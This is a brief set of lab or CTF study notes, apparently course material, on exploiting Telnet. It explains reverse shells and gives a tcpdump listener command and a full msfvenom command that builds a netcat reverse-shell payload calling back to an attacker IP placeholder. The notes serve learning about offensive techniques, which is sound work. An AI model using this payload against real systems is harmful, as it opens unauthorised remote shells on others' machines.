Exploiting Telnet

  • What is a Reverse Shell?

    • A type of shell in which the target machine communicates back to the attacking machine

    • Attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved.

  • You can start a tcpdump listener on the attacking machine using: sudo tcpdump ip proto \\icmp -i eth0

  • Use Msfvenom to generate a reverse shell payload.

    • This will generate and encode a netcat reverse shell

    • Command: msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

Last updated